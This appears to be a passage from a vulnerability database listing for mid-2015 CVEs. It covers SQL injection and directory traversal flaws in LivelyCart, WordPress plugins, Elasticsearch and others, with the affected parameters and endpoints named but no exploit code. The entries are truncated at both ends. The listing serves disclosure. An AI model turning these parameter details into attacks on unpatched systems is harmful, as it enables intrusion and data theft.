SQL injection vulnerability in LivelyCart 1.2.0 allows remote attackers to execute arbitrary SQL commands via the search_query parameter to product/search.
01-07-2015 - 11:36 30-06-2015 - 10:59
CVE-2014-9734 5.0
Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php
01-07-2015 - 11:12 30-06-2015 - 10:59
CVE-2015-4018 6.5
SQL injection vulnerability in feedwordpresssyndicationpage.class.php in the FeedWordPress plugin before 2015.0514 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the link_ids[] parameter in an Update action in t
25-06-2015 - 12:22 21-05-2015 - 16:59
CVE-2015-3337 4.3
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
25-06-2015 - 12:07 01-05-2015 - 11:59
CVE-2015-3325 7.5
SQL injection vulnerability in forum.php in the WP Symposium plugin before 15.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the show parameter in the QUERY_STRING to the default URI.
25-06-2015 - 11:50 15-05-2015 - 14:59
CVE-2015-4658 7.5
Multiple SQL injection vulnerabilities in admin/login.php in Milw0rm Clone Script